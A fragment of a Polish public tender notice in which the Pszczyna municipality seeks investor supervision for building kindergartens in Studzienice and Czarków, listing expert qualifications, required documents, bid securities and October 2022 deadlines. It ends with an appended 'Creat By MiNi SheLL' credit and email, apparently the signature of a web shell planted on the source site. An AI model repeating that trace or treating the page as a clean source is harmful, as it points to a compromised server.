zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia w branży konstrukcyjno-budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> I.	DLA ZADANIA NR 1: BUDOWA PRZEDSZKOLA W STUDZIENICACH PRZY UL. ŚW. JANA PAWŁA II 74: <br/>1	Zdolność do występowania w obrocie gospodarczym: Zamawiający nie stawia szczególnych wymagań w tym zakresie; <br/>2	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie stawia szczególnych wymagań w tym zakresie; <br/>3	Sytuacja ekonomiczna lub finansowa<br/>Zamawiający wymaga, aby Wykonawca posiadał ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną minimum 400.000,00 zł (słownie: czterysta tysięcy złotych). <br/>4 Zdolność techniczna i zawodowa<br/>4.1 Doświadczenie zawodowe:<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie doświadczenia tj., że: w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali należycie co najmniej jedną usługę polegające na nadzorowaniu, koordynowaniu i kontrolowaniu, pełnieniu funkcji inżyniera kontraktu, inspektora nadzoru inwestorskiego przy budowie lub/i przebudowie lub/i rozbudowie lub/i odbudowie jednego budynku o kubaturze min. 3 000 m3 wraz z zagospodarowaniem terenu. <br/><br/>4.2 Zdolność techniczna:<br/>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie dysponowania następującymi osobami zdolnymi do wykonania zamówienia:<br/>1) Ekspert kluczowy nr 1: Kierownik Zespołu - Inżynier Rezydent, posiadający:<br/>•	wykształcenie wyższe techniczne, <br/>•	co najmniej 5-letnie doświadczenie zawodowe,<br/>•	doświadczenie w kierowaniu kontraktami na roboty – pełnienie powyższej roli przy minimum 1 projekcie o wartości robót minimum 9 000 000,00 zł. brutto każdy<br/>2) Ekspert kluczowy nr 2: Inspektor Nadzoru – specjalista w zakresie robót budowlanych w specjalności konstrukcyjno - budowlanej posiadający:<br/>	uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej lub równoważne wydane na podstawie wcześniej obowiązujących przepisów, z doświadczeniem w pełnieniu samodzielnych funkcji w budownictwie tj. jako kierownik budowy, kierownik robót konstrukcyjno-budowlanych lub inspektor nadzoru przy budowie lub/i przebudowie lub/i rozbudowie lub/i odbudowie, nadbudowie jednego budynku o kubaturze min. 3 000 m3 wraz z zagospodarowaniem terenu. <br/>3) Ekspert kluczowy nr 3: Inspektor Nadzoru – specjalista w zakresie robót instalacji i sieci sanitarnych, posiadający:<br/>•	uprawnienia budowlane do kierowania robotami budowlanymi w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, a w przypadku Wykonawców zagranicznych –uprawnienia budowlane do kierowania robotami równoważne do wyżej wskazanych z minimum jednym doświadczeniem jako inspektor nadzoru lub kierownik robót sanitarnych przy budowie lub/i przebudowie lub/i rozbudowie lub/i odbudowie, nadbudowie min, jednego budynku o wartości instalacji sanitarnych min. 500 000,00 zł brutto każda<br/>4) Ekspert kluczowy nr 4: Inspektor Nadzoru – specjalista w zakresie robót elektrycznych i elektroenergetycznych, posiadający: <br/>•	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, a w przypadku Wykonawców zagranicznych – uprawnienia budowlane do kierowania robotami równoważne do wyżej wskazanych z minimum jednym doświadczeniem jako inspektor nadzoru lub kierownik robót elektrycznych przy budowie lub/i przebudowie lub/i rozbudowie lub/i odbudowie, nadbudowie lub/i rozbudowie lub/i odbudowie, nadbudowie min jednego budynku o wartości instalacji elektrycznych min. 300 000,00 zł brutto każda<br/> 5) Ekspert kluczowy nr 5: Inspektor Nadzoru – specjalista w zakresie robót drogowych <br/>•	uprawnienia do kierowania robotami budowlanymi w specjalności drogowej lub równoważne wydane na podstawie wcześniej obowiązujących przepisów,<br/>•	nie mniej niż 5-letnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji w budownictwie tj. jako kierownik budowy lub inspektor nadzoru robót w zakresie robót drogowych.<br/>II.	DLA ZADANIA NR 2: BUDOWA PRZEDSZKOLA W CZARKOWIE PRZY UL. POWSTAŃCÓW ŚL. 25<br/>1.	Zdolność do występowania w obrocie gospodarczym: Zamawiający nie stawia szczególnych wymagań w tym zakresie; <br/>2	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie stawia szczególnych wymagań w tym zakresie; <br/>3	Sytuacja ekonomiczna lub finansowa<br/>Zamawiający wymaga, aby Wykonawca posiadał ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną minimum 400 000,00 zł (słownie: czterysta tysięcy złotych). <br/>4 Zdolność techniczna i zawodowa<br/>4.1 Doświadczenie zawodowe:<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie doświadczenia tj., że: w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali należycie co najmniej jedną usługę polegające na nadzorowaniu, koordynowaniu i kontrolowaniu, pełnieniu funkcji inżyniera kontraktu, inspektora nadzoru inwestorskiego przy budowie lub/i przebudowie lub/i rozbudowie lub/i odbudowie jednego budynku o kubaturze min. 3 000 m3 wraz z zagospodarowaniem terenu. <br/>Wykonawca nie może sumować kubatury kilku usług o mniejszym zakresie dla uzyskania wymaganych wartości porównywalnych.<br/>4.2 Zdolność techniczna:<br/>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie dysponowania następującymi osobami zdolnymi do wykonania zamówienia:<br/>1) Ekspert kluczowy nr 1: Kierownik Zespołu - Inżynier Rezydent, posiadający:<br/>•	wykształcenie wyższe techniczne, <br/>•	co najmniej 5-letnie doświadczenie zawodowe,<br/>•	doświadczenie w kierowaniu kontraktami na roboty – pełnienie powyższej roli przy minimum 1 projekcie o wartości robót minimum 9 000 000,00 zł. brutto każdy<br/>2) Ekspert kluczowy nr 2: Inspektor Nadzoru – specjalista w zakresie robót budowlanych w specjalności konstrukcyjno - budowlanej posiadający:<br/>	uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej lub równoważne wydane na podstawie wcześniej obowiązujących przepisów, z doświadczeniem w pełnieniu samodzielnych funkcji w budownictwie tj. jako kierownik budowy, kierownik robót konstrukcyjno-budowlanych lub inspektor nadzoru przy budowie lub/i przebudowie lub/i rozbudowie lub/i odbudowie, nadbudowie jednego budynku o kubaturze min. 3 000 m3 wraz z zagospodarowaniem terenu. <br/>3) Ekspert kluczowy nr 3: Inspektor Nadzoru – specjalista w zakresie robót instalacji i sieci sanitarnych, posiadający:<br/>•	uprawnienia budowlane do kierowania robotami budowlanymi w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, a w przypadku Wykonawców zagranicznych –uprawnienia budowlane do kierowania robotami równoważne do wyżej wskazanych z minimum jednym doświadczeniem jako inspektor nadzoru lub kierownik robót sanitarnych przy budowie lub/i przebudowie lub/i rozbudowie lub/i odbudowie, nadbudowie min, jednego budynku o wartości instalacji sanitarnych min. 500 000,00 zł brutto każda<br/>4) Ekspert kluczowy nr 4: Inspektor Nadzoru – specjalista w zakresie robót elektrycznych i elektroenergetycznych, posiadający: <br/>•	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, a w przypadku Wykonawców zagranicznych – uprawnienia budowlane do kierowania robotami równoważne do wyżej wskazanych z minimum jednym doświadczeniem jako inspektor nadzoru lub kierownik robót elektrycznych przy budowie lub/i przebudowie lub/i rozbudowie lub/i odbudowie, nadbudowie lub/i rozbudowie lub/i odbudowie, nadbudowie min jednego budynku o wartości instalacji elektrycznych min. 300 000,00 zł brutto każda<br/> 5) Ekspert kluczowy nr 5: Inspektor Nadzoru – specjalista w zakresie robót drogowych <br/>•	uprawnienia do kierowania robotami budowlanymi w specjalności drogowej lub równoważne wydane na podstawie wcześniej obowiązujących przepisów,<br/>•	nie mniej niż 5-letnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji w budownictwie tj. jako kierownik budowy lub inspektor nadzoru robót w zakresie robót drogowych.<br/>Szczegółowe określenie warunków zawarte zostało w SWZ, Rozdział IV, pkt 3 <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/><br/>2. zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/><br/>3. zaświadczenia albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/><br/>4. oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 6 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; - potwierdzających spełnienie warunku opisanego w Rozdziale IV pkt I. 3.4.1. i II. 3.4.1; - Załącznik nr 6 do SWZ.<br/><br/>2. wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - potwierdzających spełnienie warunku opisanego w Rozdziale IV pkt I. 3.4.2. i II 3.4.2; - Załącznik nr 4 do SWZ.<br/><br/>3. polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, ze wskazaniem sumy gwarancyjnej tego ubezpieczenia, potwierdzający spełnienie warunku określonego w Rozdziale IV pkt I. 3.3. lub II. 3.3 SWZ, wraz z dowodem opłacenia składki.<br/><br/>Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć dokumentów dotyczących sytuacji finansowej lub ekonomicznej wymaganych przez Zamawiającego, może złożyć inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego. Pełnomocnictwo pod rygorem nieważności składa się w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/>2. Dokument (np. zobowiązanie) innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji, o ile Wykonawca korzysta ze zdolności lub sytuacji innych podmiotów na zasadach określonych w art. 118 ustawy (jeżeli dotyczy).<br/> 3. Potwierdzenie wniesienia wadium <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> a)	Zadanie nr 1: 5 000,00 .zł (słownie: pięć tysięcy złotych)<br/>b)	Zadanie nr 2: 4 000,00 .zł (słownie: cztery tysiące złotych) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wzór przyszłej umowy z wybranym w wyniku przetargu Wykonawcą stanowi Załącznik nr 4 do niniejszej specyfikacji.<br/>2.	Zmiana postanowień niniejszej Umowy może nastąpić za zgodą obydwu Stron wyrażoną na piśmie w formie aneksu do umowy z zachowaniem formy pisemnej pod rygorem nieważności takiej zmiany, na zasadach przewidzianych w art. 455 ust. 1 pkt 2) – 4), ust. 2 Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Formularza dostępnego na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-12 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Podstawy wykluczenia:<br/>Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę w stosunku, do którego zachodzi którakolwiek z okoliczności, o których mowa w art. 108 ust. 1 pkt. 1-6 ustawy Pzp, oraz art. 7 ust. 1 ustawy z 13 kwietnia 2022r o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służącym ochronie bezpieczeństwa narodowego (Dz.U. z 2022, poz. 835), oraz w art. 5k rozporządzenia Rady UE nr 833/2014 z 13 lipca 2014 roku. (przesłanki obligatoryjne).<br/>2. Źródła finansowania: <br/>a)	Środki finansowe własne Gminy Pszczyna.<br/>b)	Środki zewnętrzne z Programu Rządowy Fundusz Polski Ład: Program Inwestycji Strategicznych, zgodnie z dokumentami programu dostępnymi pod linkiem https://www.bgk.pl/polski-lad/edycja-trzecia-pgr/#c21649.<br/>3. Termin realizacji zamówienia:<br/>Zadanie nr 1: Budowa przedszkola wraz z niezbędna infrastrukturą techniczną i zagospodarowaniem terenu w Studzienicach przy ul. Św. Jana Pawła II 74<br/>a)	rozpoczęcie – od dnia podpisania umowy<br/>b)	zakończenie – do 15 grudnia 2023 roku <br/> Zadanie nr 2: Budowa przedszkola wraz z niezbędna infrastrukturą techniczną i zagospodarowaniem terenu w Czarkowie przy ul. Powstańców Śl. 25”<br/>a)	rozpoczęcie – od dnia podpisania umowy<br/>b)	zakończenie – do 15 grudnia 2023 roku <br/>Ustala się, że w przypadku zmiany terminu wykonania Zadania inwestycyjnego termin zakończenia realizacji umowy dla danego Zadania ulega skróceniu lub przedłużeniu do terminu zakończenia i odbioru danego Zadania i nie wymaga to składania dodatkowych oświadczeń woli przez strony, a w przypadku wydłużenia terminu zakończenia i odbioru inwestycji, zasady przedłużenia umowy określone zostaną w umowie, przy czym wydłużenie nie będzie stanowiło podstawy zwiększenia należnego wynagrodzenia tytułem sprawowania nadzoru inwestorskiego nad realizowaną inwestycją.

Creat By MiNi SheLL
Email: jattceo@gmail.com